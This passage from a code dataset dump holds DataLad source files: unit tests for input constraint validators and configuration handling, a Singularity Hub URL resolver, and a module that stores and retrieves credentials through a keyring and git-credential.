DataLad keeps the necessary information in dedicated Git branches.\"\nrun \"git branch\"\n" }, { "alpha_fraction": 0.5759630799293518, "alphanum_fraction": 0.6018719673156738, "avg_line_length": 30.639484405517578, "blob_id": "1b751d6791a0ec34ae08ff7b9950b66e3dc6542a", "content_id": "0881547fdb657e070fe412842274736c8bc4a939", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7372, "license_type": "permissive", "max_line_length": 86, "num_lines": 233, "path": "/datalad/tests/test_constraints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n'''Unit tests for basic constraints functionality.'''\n\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom ..support import constraints as ct\n\n\ndef test_int():\n c = ct.EnsureInt()\n # this should always work\n assert_equal(c(7), 7)\n assert_equal(c(7.0), 7)\n assert_equal(c('7'), 7)\n assert_equal(c([7, 3]), [7, 3])\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c([3, 'fail']))\n # this will also fail\n assert_raises(ValueError, lambda: c('17.0'))\n assert_equal(c.short_description(), 'int')\n\n\ndef test_float():\n c = ct.EnsureFloat()\n # this should always work\n assert_equal(c(7.0), 7.0)\n assert_equal(c(7), 7.0)\n assert_equal(c('7'), 7.0)\n assert_equal(c([7.0, '3.0']), [7.0, 3.0])\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c([3.0, 'fail']))\n\n\ndef test_bool():\n c = ct.EnsureBool()\n # this should always work\n assert_equal(c(True), True)\n assert_equal(c(False), False)\n # all that resuls in True\n assert_equal(c('True'), True)\n assert_equal(c('true'), True)\n assert_equal(c('1'), True)\n assert_equal(c('yes'), True)\n assert_equal(c('on'), True)\n assert_equal(c('enable'), True)\n # all that resuls in False\n assert_equal(c('false'), False)\n assert_equal(c('False'), False)\n assert_equal(c('0'), False)\n assert_equal(c('no'), False)\n assert_equal(c('off'), False)\n assert_equal(c('disable'), False)\n # this should always fail\n assert_raises(ValueError, c, 0)\n assert_raises(ValueError, c, 1)\n\n\ndef test_str():\n c = ct.EnsureStr()\n # this should always work\n assert_equal(c('hello'), 'hello')\n assert_equal(c('7.0'), '7.0')\n # this should always fail\n assert_raises(ValueError, lambda: c(['ab']))\n assert_raises(ValueError, lambda: c(['a', 'b']))\n assert_raises(ValueError, lambda: c(('a', 'b')))\n # no automatic conversion attempted\n assert_raises(ValueError, lambda: c(7.0))\n assert_equal(c.short_description(), 'str')\n\ndef test_str_min_len():\n c = ct.EnsureStr(min_len=1)\n assert_equal(c('hello'), 'hello')\n assert_equal(c('h'), 'h')\n assert_raises(ValueError, c, '')\n\n c = ct.EnsureStr(min_len=2)\n assert_equal(c('hello'), 'hello')\n assert_raises(ValueError, c, 'h')\n\n\ndef test_none():\n c = ct.EnsureNone()\n # this should always work\n assert_equal(c(None), None)\n # instance of NoneDeprecated is also None\n assert_equal(c(ct.NoneDeprecated), None)\n # this should always fail\n 
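    # (note: the *string* 'None' is not the None value, and a list is not None either)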
assert_raises(ValueError, lambda: c('None'))\n assert_raises(ValueError, lambda: c([]))\n\n\ndef test_callable():\n c = ct.EnsureCallable()\n # this should always work\n assert_equal(c(range), range)\n assert_raises(ValueError, c, 'range')\n\n\ndef test_choice():\n c = ct.EnsureChoice('choice1', 'choice2', None)\n # this should always work\n assert_equal(c('choice1'), 'choice1')\n assert_equal(c(None), None)\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c('None'))\n\n\ndef test_keychoice():\n c = ct.EnsureKeyChoice(key='some', values=('choice1', 'choice2', None))\n assert_equal(c({'some': 'choice1'}), {'some': 'choice1'})\n assert_equal(c({'some': None}), {'some': None})\n assert_equal(c({'some': None, 'ign': 'ore'}), {'some': None, 'ign': 'ore'})\n assert_raises(ValueError, c, 'fail')\n assert_raises(ValueError, c, 'None')\n assert_raises(ValueError, c, {'nope': 'None'})\n assert_raises(ValueError, c, {'some': 'None'})\n assert_raises(ValueError, c, {'some': ('a', 'b')})\n\n\ndef test_range():\n c = ct.EnsureRange(min=3, max=7)\n # this should always work\n assert_equal(c(3.0), 3.0)\n\n # this should always fail\n assert_raises(ValueError, lambda: c(2.9999999))\n assert_raises(ValueError, lambda: c(77))\n assert_raises(TypeError, lambda: c('fail'))\n assert_raises(TypeError, lambda: c((3, 4)))\n # since no type checks are performed\n assert_raises(TypeError, lambda: c('7'))\n\n # Range doesn't have to be numeric\n c = ct.EnsureRange(min=\"e\", max=\"qqq\")\n assert_equal(c('e'), 'e')\n assert_equal(c('fa'), 'fa')\n assert_equal(c('qq'), 'qq')\n assert_raises(ValueError, c, 'a')\n assert_raises(ValueError, c, 'qqqa')\n\n\ndef test_listof():\n c = ct.EnsureListOf(str)\n assert_equal(c(['a', 'b']), ['a', 'b'])\n assert_equal(c(['a1', 'b2']), ['a1', 'b2'])\n assert_equal(c('a1 b2'), ['a1 b2'])\n\n\ndef test_tupleof():\n c = ct.EnsureTupleOf(str)\n assert_equal(c(('a', 'b')), ('a', 'b'))\n assert_equal(c(('a1', 'b2')), ('a1', 'b2'))\n assert_equal(c('a1 b2'), ('a1 b2',))\n\n\ndef test_constraints():\n # this should always work\n c = ct.Constraints(ct.EnsureFloat())\n assert_equal(c(7.0), 7.0)\n c = ct.Constraints(ct.EnsureFloat(), ct.EnsureRange(min=4.0))\n assert_equal(c(7.0), 7.0)\n # __and__ form\n c = ct.EnsureFloat() & ct.EnsureRange(min=4.0)\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.9)\n c = ct.Constraints(ct.EnsureFloat(), ct.EnsureRange(min=4), ct.EnsureRange(max=9))\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.9)\n assert_raises(ValueError, c, 9.01)\n # __and__ form\n c = ct.EnsureFloat() & ct.EnsureRange(min=4) & ct.EnsureRange(max=9)\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.99)\n assert_raises(ValueError, c, 9.01)\n # and reordering should not have any effect\n c = ct.Constraints(ct.EnsureRange(max=4), ct.EnsureRange(min=9), ct.EnsureFloat())\n assert_raises(ValueError, c, 3.99)\n assert_raises(ValueError, c, 9.01)\n\n\ndef test_altconstraints():\n # this should always work\n c = ct.AltConstraints(ct.EnsureFloat())\n assert_equal(c(7.0), 7.0)\n c = ct.AltConstraints(ct.EnsureFloat(), ct.EnsureNone())\n assert_equal(c.short_description(), '(float or None)')\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n # __or__ form\n c = ct.EnsureFloat() | ct.EnsureNone()\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n\n # this should always fail\n c = ct.Constraints(ct.EnsureRange(min=0, max=4), ct.EnsureRange(min=9, max=11))\n assert_raises(ValueError, 
c, 7.0)\n c = ct.EnsureRange(min=0, max=4) | ct.EnsureRange(min=9, max=11)\n assert_equal(c(3.0), 3.0)\n assert_equal(c(9.0), 9.0)\n assert_raises(ValueError, c, 7.0)\n assert_raises(ValueError, c, -1.0)\n\n\ndef test_both():\n # this should always work\n c = ct.AltConstraints(\n ct.Constraints(\n ct.EnsureFloat(),\n ct.EnsureRange(min=7.0, max=44.0)),\n ct.EnsureNone())\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n # this should always fail\n assert_raises(ValueError, lambda: c(77.0))\n\ndef test_type_str():\n assert_equal(ct._type_str((str,)), 'str')\n assert_equal(ct._type_str(str), 'str')\n" }, { "alpha_fraction": 0.5881273150444031, "alphanum_fraction": 0.591799259185791, "avg_line_length": 31.68000030517578, "blob_id": "5bbe29af1d9ed94e9d0a3806fbfbdfcba9d89679", "content_id": "8624b869734c9425b60877f93f41f846a31e7cc9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "permissive", "max_line_length": 87, "num_lines": 50, "path": "/datalad/downloaders/shub.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support for resolving Singularity Hub URLs\n\"\"\"\n\nimport json\nfrom logging import getLogger\n\nfrom datalad.dochelpers import borrowkwargs\nfrom datalad.downloaders.http import HTTPDownloader\nfrom datalad.support.exceptions import DownloadError\nfrom datalad.utils import auto_repr\n\nlgr = getLogger(\"datalad.downloaders.shub\")\n\n\n@auto_repr\nclass SHubDownloader(HTTPDownloader):\n \"\"\"Resolve shub:// URLs before handing them off to HTTPDownloader.\n \"\"\"\n\n api_url = \"https://singularity-hub.org/api/container/\"\n\n @borrowkwargs(HTTPDownloader)\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _resolve_url(self, url):\n if not url.startswith(\"shub://\"):\n return url\n\n info_url = self.api_url + url[7:]\n content = self.fetch(info_url)\n try:\n shub_info = json.loads(content)\n except json.decoder.JSONDecodeError as e:\n raise DownloadError(\n \"Failed to get information from {}\"\n .format(info_url)) from e\n return shub_info[\"image\"]\n\n @borrowkwargs(HTTPDownloader)\n def access(self, method, url, *args, **kwargs):\n return super().access(method, self._resolve_url(url), *args, **kwargs)\n" }, { "alpha_fraction": 0.5983073711395264, "alphanum_fraction": 0.6007757782936096, "avg_line_length": 37.32239532470703, "blob_id": "cb8163276bd3b98a8a29f69a03dcdd364c3ae2e9", "content_id": "bf21a6229604e21281f0f0be31b2dda9b576948b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19851, "license_type": "permissive", "max_line_length": 100, "num_lines": 518, "path": "/datalad/downloaders/credentials.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for 
the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface information about credentials\n\nProvides minimalistic interface to deal (query, request, store) with most common\ntypes of credentials. To be used by Authenticators\n\"\"\"\n\n__dev_doc__ = \"\"\"\nPossibly useful in the future 3rd part developments\n\nhttps://github.com/omab/python-social-auth\n social authentication/registration mechanism with support for several\n frameworks and auth providers\n\"\"\"\n\nimport time\n\nfrom ..support.exceptions import (\n AccessDeniedError,\n CapturedException,\n)\nfrom ..support.keyring_ import keyring as keyring_\nfrom ..ui import ui\nfrom ..utils import auto_repr\nfrom ..support.network import iso8601_to_epoch\n\nfrom datalad import cfg as dlcfg\nfrom datalad.config import anything2bool\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.local.gitcredential import GitCredentialInterface\n\nfrom logging import getLogger\nlgr = getLogger('datalad.downloaders.credentials')\n\n\n@auto_repr\nclass Credential(object):\n \"\"\"Base class for different types of credentials\n\n Note: While subclasses can define their own `_FIELDS`, they are actually\n assumed to have particular keys by the implementation of (some)\n authenticators. `HTTPRequestsAuthenticator` and its subclasses for example,\n assume `user` and `password` to be valid keys.\n \"\"\"\n\n # Should be defined in a subclass as a dict of fields\n # name -> dict(attributes)\n _FIELDS = None\n _KNOWN_ATTRS = {\n 'hidden', # UI should not display the value\n 'repeat', # UI should repeat entry or not. Set to False to override default logic\n 'optional', # Not mandatory thus not requested if not set\n }\n\n def __init__(self, name, url=None, keyring=None, auth_url=None,\n dataset=None):\n \"\"\"\n Parameters\n ----------\n name : str\n Name of the credential, as it would be identified by in the centralized\n storage of credentials\n url : str, optional\n URL string to point users to where to seek obtaining the credentials\n keyring : a keyring\n An object providing (g|s)et_password. If None, keyring module is used\n as is\n auth_url : str, optional\n URL string this credential is going to be used with. This context\n may be needed to query some credential systems (like git-credential).\n dataset : str, Path or Dataset\n The dataset datalad is operating on with this credential. This may\n be needed for context in order to query local configs.\n \"\"\"\n self.name = name\n self.url = url\n self.set_context(auth_url=auth_url, dataset=dataset)\n self._keyring = keyring or keyring_\n self._prepare()\n\n def _prepare(self):\n \"\"\"Additional house-keeping possibly to be performed in subclasses\n\n Created to avoid all the passing args/kwargs of __init__ all the time\n \"\"\"\n # Basic checks\n for f, fattrs in self._FIELDS.items():\n unknown_attrs = set(fattrs).difference(self._KNOWN_ATTRS)\n if unknown_attrs:\n raise ValueError(\"Unknown attributes %s. 
Known are: %s\"\n % (unknown_attrs, self._KNOWN_ATTRS))\n\n def _is_field_optional(self, f):\n return self._FIELDS[f].get('optional', False)\n\n @property\n def is_known(self):\n \"\"\"Return True if values for all fields of the credential are known\"\"\"\n try:\n return all(\n self._is_field_optional(f) or self._get_field_value(f) is not None\n for f in self._FIELDS)\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to query keyring: %s\", ce)\n return False\n\n def _get_field_value(self, field):\n return dlcfg.get('datalad.credential.{name}.{field}'.format(\n name=self.name,\n field=field.replace('_', '-')\n )) or self._keyring.get(self.name, field)\n\n def _ask_field_value(self, f, instructions=None):\n msg = instructions if instructions else \\\n (\"You need to authenticate with %r credentials.\" % self.name +\n (\" %s provides information on how to gain access\"\n % self.url if self.url else ''))\n\n # provide custom options only if set for the field\n f_props = self._FIELDS[f]\n kwargs = {}\n for p in ('hidden', 'repeat'):\n if p in f_props:\n kwargs[p] = f_props[p]\n return ui.question(\n f,\n title=msg,\n **kwargs\n )\n\n def _ask_and_set(self, f, instructions=None):\n v = self._ask_field_value(f, instructions=instructions)\n try:\n self.set(**{f: v})\n except Exception as e:\n lgr.error(\"Failed to record credential field %r: %s\", f, CapturedException(e))\n return v\n\n def enter_new(self, instructions=None, **kwargs):\n \"\"\"Enter new values for the credential fields\n\n Parameters\n ----------\n instructions : str, optional\n If given, the auto-generated instructions based on a login-URL are\n replaced by the given string\n **kwargs\n Any given key value pairs with non-None values are used to set the\n field `key` to the given value, without asking for user input\n \"\"\"\n if kwargs:\n unknown_fields = set(kwargs).difference(self._FIELDS)\n known_fields = set(self._FIELDS).difference(kwargs)\n if unknown_fields:\n raise ValueError(\n \"Unknown to %s field(s): %s. Known but not specified: %s\"\n % (self,\n ', '.join(sorted(unknown_fields)),\n ', '.join(sorted(known_fields))\n ))\n # Use ui., request credential fields corresponding to the type\n for f in self._FIELDS:\n if kwargs.get(f, None):\n # use given value, don't ask\n self.set(**{f: kwargs[f]})\n elif not self._is_field_optional(f):\n self._ask_and_set(f, instructions=instructions)\n\n def __call__(self, instructions=None):\n \"\"\"Obtain credentials from a keyring and if any is not known -- ask\n\n Parameters\n ----------\n instructions : str, optional\n If given, the auto-generated instructions based on a login-URL are\n replaced by the given string\n \"\"\"\n fields = {}\n # check if we shall ask for credentials, even if some are on record\n # already (but maybe they were found to need updating)\n force_reentry = dlcfg.obtain(\n 'datalad.credentials.force-ask',\n valtype=anything2bool)\n for f in self._FIELDS:\n # don't query for value if we need to get a new one\n v = None if force_reentry else self._get_field_value(f)\n if not self._is_field_optional(f):\n while v is None: # was not known\n v = self._ask_and_set(f, instructions=instructions)\n fields[f] = v\n elif v is not None:\n fields[f] = v\n return fields\n\n def set(self, **kwargs):\n \"\"\"Set field(s) of the credential\"\"\"\n for f, v in kwargs.items():\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. 
Known are: %s\"\n % (f, self._FIELDS.keys()))\n self._keyring.set(self.name, f, v)\n\n def get(self, f, default=None):\n \"\"\"Get a field of the credential\"\"\"\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. Known are: %s\"\n % (f, self._FIELDS.keys()))\n try:\n return self._get_field_value(f)\n except: # MIH: what could even happen? _keyring not a dict?\n return default\n\n def delete(self):\n \"\"\"Deletes credential values from the keyring\"\"\"\n for f in self._FIELDS:\n self._keyring.delete(self.name, f)\n\n def set_context(self, auth_url=None, dataset=None):\n \"\"\"Set URL/dataset context after instantiation\n\n ATM by design the system of providers+downloaders+credentials doesn't\n necessarily provide access to that information at instantiation time of\n `Credential` objects. Hence, allow to provide this whenever we can.\n\n Arguments are only applied if provided. Hence, `None` does not overwrite\n a possibly already existing attribute.\n\n Note\n ----\n Eventually, this is going to need a major overhaul. `Providers` etc. are\n built to be mostly unaware of their context, which is why\n `get_dataset_root()` tends to be the only way of assessing what dataset\n we are operating on. This will, however, fail to detect the correct\n dataset, if it can'T be deduced from PWD, though.\n\n Parameters\n ----------\n auth_url : str, optional\n URL string this credential is going to be used with. This context\n may be needed to query some credential systems (like git-credential).\n dataset : str, Path or Dataset, optional\n The dataset datalad is operating on with this credential. This may\n be needed for context in order to query local configs.\n \"\"\"\n\n # TODO: change of context should probably not be allowed. When context\n # is actually needed for a particular credential store, this\n # object represents such associated creds.\n # Allowing to switch context within the same instance leads to\n # trouble determining when exactly a reload is needed and what is\n # to be overwritten or not.\n\n\n\n if auth_url:\n self.auth_url = auth_url\n if isinstance(dataset, Dataset):\n self.ds = dataset\n else:\n self.ds = Dataset(dataset) if dataset else None\n\n\nclass UserPassword(Credential):\n \"\"\"Simple type of a credential which consists of user/password pair\"\"\"\n\n _FIELDS = dict([('user', {}),\n ('password', {'hidden': True})])\n\n is_expired = False # no expiration provisioned\n\n\nclass Token(Credential):\n \"\"\"Simple type of a credential which provides a single token\"\"\"\n\n _FIELDS = dict([('token', {'hidden': True, 'repeat': False})])\n\n is_expired = False # no expiration provisioned\n\n\nclass AWS_S3(Credential):\n \"\"\"Credential for AWS S3 service\"\"\"\n\n _FIELDS = dict([('key_id', {'repeat': False}),\n ('secret_id', {'hidden': True, 'repeat': False}),\n ('session', {'optional': True}),\n ('expiration', {'optional': True}),\n ])\n\n @property\n def is_expired(self):\n exp = self.get('expiration', None)\n if not exp:\n return False\n exp_epoch = iso8601_to_epoch(exp)\n # -2 to artificially shorten duration of the allotment to avoid\n # possible race conditions between us checking either it has\n # already expired before submitting a request.\n expire_in = (exp_epoch - time.time() - 2) / 3600.\n\n lgr.debug(\n (\"Credential %s has expired %.2fh ago\"\n if expire_in <= 0 else \"Credential %s will expire in %.2fh\")\n % (self.name, expire_in))\n return expire_in <= 0\n\n\n@auto_repr\nclass CompositeCredential(Credential):\n \"\"\"Credential which 
represent a sequence of Credentials where front one is exposed to user\n \"\"\"\n\n # To be defined in sub-classes\n _CREDENTIAL_CLASSES = None\n _CREDENTIAL_ADAPTERS = None\n\n def _prepare(self):\n assert len(self._CREDENTIAL_CLASSES) > 1, \"makes sense only if there is > 1 credential\"\n assert len(self._CREDENTIAL_CLASSES) == len(self._CREDENTIAL_ADAPTERS) + 1, \\\n \"there should be 1 less of adapter than _CREDENTIAL_CLASSES\"\n\n for C in self._CREDENTIAL_CLASSES:\n assert issubclass(C, Credential), \"%s must be a subclass of Credential\" % C\n\n # First credential should bear the name and url\n credentials = [self._CREDENTIAL_CLASSES[0](self.name, url=self.url, keyring=self._keyring)]\n # and we just reuse its _FIELDS for _ask_field_value etc\n self._FIELDS = credentials[0]._FIELDS\n # the rest with index suffix, but storing themselves in the same keyring\n for iC, C in enumerate(self._CREDENTIAL_CLASSES[1:]):\n credentials.append(\n C(name=\"%s:%d\" % (self.name, iC + 1), url=None, keyring=self._keyring)\n )\n self._credentials = credentials\n\n super(CompositeCredential, self)._prepare()\n\n # Here it becomes tricky, since theoretically it is the \"tail\"\n # ones which might expire etc, so we wouldn't exactly know what\n # new credentials outside process wanted -- it would be silly to ask\n # right away the \"entry\" credentials if it is just the expiration of the\n # tail credentials\n def enter_new(self):\n # should invalidate/remove all tail credentials to avoid failing attempts to login\n self._credentials[0].enter_new()\n self.refresh()\n\n def refresh(self):\n \"\"\"Re-establish \"dependent\" credentials\n\n E.g. if code outside was reported that it expired somehow before known expiration datetime\n \"\"\"\n for c in self._credentials[1:]:\n c.delete()\n # trigger re-establishing the chain\n _ = self()\n if self.is_expired:\n raise RuntimeError(\"Credential %s expired right upon refresh: should have not happened\")\n\n @property\n def is_expired(self):\n return any(c.is_expired for c in self._credentials)\n\n def __call__(self):\n \"\"\"Obtain credentials from a keyring and if any is not known -- ask\"\"\"\n # Start from the tail until we have credentials set\n idx = len(self._credentials) - 1\n for c in self._credentials[::-1]:\n if c.is_known and not c.is_expired:\n break\n idx -= 1\n\n if idx < 0:\n # none was known, all the same -- start with the first one\n idx = 0\n\n # TODO: consider moving logic of traversal into authenticator since it is\n # the one spitting out authentication error etc\n # Theoretically we could just reuse 'fields' from adapter in the next step\n # but let's do full circle, so that if any \"normalization\" is done by\n # Credentials we take that into account\n for c, adapter, next_c in zip(\n self._credentials[idx:],\n self._CREDENTIAL_ADAPTERS[idx:],\n self._credentials[idx + 1:]):\n fields = c()\n next_fields = adapter(self, **fields)\n next_c.set(**next_fields)\n\n return self._credentials[-1]()\n\n\ndef _nda_adapter(composite, user=None, password=None):\n from datalad.support.third.nda_aws_token_generator import NDATokenGenerator\n from .. 
import cfg\n nda_auth_url = cfg.obtain('datalad.externals.nda.dbserver')\n gen = NDATokenGenerator(nda_auth_url)\n lgr.debug(\"Generating token for NDA user %s using %s talking to %s\",\n user, gen, nda_auth_url)\n try:\n token = gen.generate_token(user, password)\n except Exception as exc: # it is really just an \"Exception\"\n exc_str = str(exc).lower()\n # ATM it is \"Invalid username and/or password\"\n # but who knows what future would bring\n if \"invalid\" in exc_str and (\"user\" in exc_str or \"password\" in exc_str):\n raise AccessDeniedError(exc_str)\n raise\n # There are also session and expiration we ignore... TODO anything about it?!!!\n # we could create a derived AWS_S3 which would also store session and expiration\n # and then may be Composite could use those????\n return dict(key_id=token.access_key, secret_id=token.secret_key,\n session=token.session, expiration=token.expiration)\n\n\nclass NDA_S3(CompositeCredential):\n \"\"\"Credential to access NDA AWS\n\n So for NDA we need a credential which is a composite credential.\n User provides UserPassword and then some adapter generates AWS_S3\n out of it\n \"\"\"\n _CREDENTIAL_CLASSES = (UserPassword, AWS_S3)\n _CREDENTIAL_ADAPTERS = (_nda_adapter,)\n\n\ndef _loris_adapter(composite, user=None, password=None, **kwargs):\n from datalad.support.third.loris_token_generator import LORISTokenGenerator\n\n gen = LORISTokenGenerator(url=composite.url)\n token = gen.generate_token(user, password)\n\n return dict(token=token)\n\n\nclass LORIS_Token(CompositeCredential):\n _CREDENTIAL_CLASSES = (UserPassword, Token)\n _CREDENTIAL_ADAPTERS = (_loris_adapter,)\n\n def __init__(self, name, url=None, keyring=None):\n super(CompositeCredential, self).__init__(name, url, keyring)\n\n\nclass GitCredential(Credential):\n \"\"\"Credential to access git-credential\n \"\"\"\n\n\n _FIELDS = dict([('user', {}),\n ('password', {'hidden': True})])\n\n # substitute keys used within datalad by the ones used by git-credential\n _FIELDS_GIT = {'user': 'username',\n 'password': 'password'}\n\n is_expired = False # no expiration provisioned\n\n def __init__(self, name, url=None, keyring=None,\n auth_url=None, dataset=None):\n super().__init__(name, url=url, keyring=keyring,\n auth_url=auth_url, dataset=dataset)\n\n def _get_field_value(self, field):\n\n from datalad import cfg as dlcfg\n cfg = self.ds.config if self.ds else dlcfg\n cfg.reload()\n from_cfg = cfg.get('datalad.credential.{name}.{field}'.format(\n name=self.name,\n field=field.replace('_', '-')\n ))\n\n if from_cfg:\n # config takes precedence\n return from_cfg\n\n # Note:\n # In opposition to the keyring approach of other `Credential`s,\n # we don't query for single values, but for an entire \"description\".\n # Currently required methods have to return single values, though.\n # Hence, calls to `git credential fill` could be optimised. Not easy to\n # assess when exactly this class can know whether it's context is yet to\n # be completed, though, so that another `fill` would actually yield\n # something different than before.\n\n self._git_cred.fill()\n git_field = self._FIELDS_GIT[field] # translate to git-credential terms\n if git_field in self._git_cred and self._git_cred[git_field]:\n return self._git_cred[git_field]\n\n # we got nothing\n return\n\n def set(self, **kwargs):\n for f, v in kwargs.items():\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. 
Known are: %s\"\n % (f, self._FIELDS.keys()))\n\n mapped = {self._FIELDS_GIT[k]: v for k, v in kwargs.items()}\n self._git_cred = GitCredentialInterface(url=self.auth_url, repo=self.ds,\n **mapped)\n self._git_cred.approve()\n\n def delete(self):\n \"\"\"Deletes credential\"\"\"\n self._git_cred.reject()\n\n def set_context(self, auth_url=None, dataset=None):\n super().set_context(auth_url, dataset)\n self._git_cred = GitCredentialInterface(url=auth_url, repo=dataset)\n" }, { "alpha_fraction": 0.5753265023231506, "alphanum_fraction": 0.5804570913314819, "avg_line_length": 27.586666107177734, "blob_id": "59016004a04244e39ea45e01192ee052a90f50a2", "content_id": "f5e4ea2d9dc2a26403636af6f6fc4dc6f029b6a0", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4290, "license_type": "permissive", "max_line_length": 79, "num_lines": 150, "path": "/datalad/local/tests/test_configuration.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# -*- coding: utf-8 -*-\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nfrom os.path import join as opj\n\nfrom packaging.version import Version\n\nimport datalad\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_result_count,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\n\n# before 0.14 ui.message() (used in dump) was not friendly to unicode\ncomplicated_str = 'complicated {} beast with.dot'.format(\n \"の\" if Version(datalad.__version__) >= Version('0.14.0') else 'blob'\n)\n\n_config_file_content = \"\"\"\\\n[something \"user\"]\nname = Jane Doe\nemail = [email protected]\nnovalue\nempty =\nmyint = 3\n\n[onemore \"{}\"]\nfindme = 5.0\n\"\"\".format(complicated_str)\n\n_dataset_config_template = {\n 'ds': {\n '.datalad': {\n 'config': _config_file_content}}}\n\n\n@with_tree(tree=_dataset_config_template)\n@with_tempfile(mkdir=True)\ndef test_something(path=None, new_home=None):\n ds = Dataset(opj(path, 'ds')).create(force=True)\n ds.save()\n\n # catches unsupported argument combinations\n assert_raises(ValueError, ds.configuration, 'dump', scope='branch')\n assert_raises(ValueError, ds.configuration, 'set', spec=('onlyname',))\n assert_raises(ValueError, ds.configuration, 'set', spec='nosection=value')\n # we also get that from the internal helper\n from datalad.local.configuration import configuration as cfghelper\n assert_in_results(\n cfghelper('set', 'global', [('nosection', 'value')], {}),\n status='error',\n )\n assert_raises(ValueError, ds.configuration, 'invalid')\n res = ds.configuration(result_renderer='disabled')\n\n assert_in_results(\n res,\n name='something.user.name',\n value='Jane Doe')\n # UTF handling\n assert_in_results(\n res,\n name=u'onemore.{}.findme'.format(complicated_str),\n value='5.0')\n\n res = ds.configuration(\n 'set',\n spec='some.more=test',\n result_renderer='disabled',\n )\n assert_in_results(\n res,\n name='some.more',\n value='test')\n # Python tuple specs\n # swallow outputs to be able to exercise the result renderer\n with swallow_outputs():\n res = ds.configuration(\n 'set',\n spec=[\n 
('some.more.still', 'test2'),\n # value is non-str -- will be converted\n ('lonely.val', 4)],\n )\n assert_in_results(\n res,\n name='some.more.still',\n value='test2')\n assert_in_results(\n res,\n name='lonely.val',\n value='4')\n\n assert_in_results(\n ds.configuration('get', spec='lonely.val'),\n status='ok',\n name='lonely.val',\n value='4',\n )\n\n # remove something that does not exist in the specified scope\n assert_in_results(\n ds.configuration('unset', scope='branch', spec='lonely.val',\n result_renderer='disabled', on_failure='ignore'),\n status='error')\n # remove something that does not exist in the specified scope\n assert_in_results(\n ds.configuration('unset', spec='lonely.val',\n result_renderer='disabled'),\n status='ok')\n assert_not_in('lonely.val', ds.config)\n # errors if done again\n assert_in_results(\n ds.configuration('unset', spec='lonely.val',\n result_renderer='disabled', on_failure='ignore'),\n status='error')\n\n # add a subdataset to test recursive operation\n subds = ds.create('subds')\n\n with swallow_outputs():\n res = ds.configuration('set', spec='rec.test=done', recursive=True)\n assert_result_count(\n res,\n 2,\n name='rec.test',\n value='done',\n )\n\n # exercise the result renderer\n with swallow_outputs() as cml:\n ds.configuration(recursive=True)\n # we get something on the subds with the desired markup\n assert_in('<ds>/subds:rec.test=done', cml.out)\n" }, { "alpha_fraction": 0.6075718998908997, "alphanum_fraction": 0.6087865829467773, "avg_line_length": 39.4863395690918, "blob_id": "aa566315a62705be72353eb8ee33634d9dda539f", "content_id": "029cf507b840267d9c3d5d5720e98713ed3bf65f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29636, "license_type": "permissive", "max_line_length": 118, "num_lines": 732, "path": "/datalad/distribution/dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 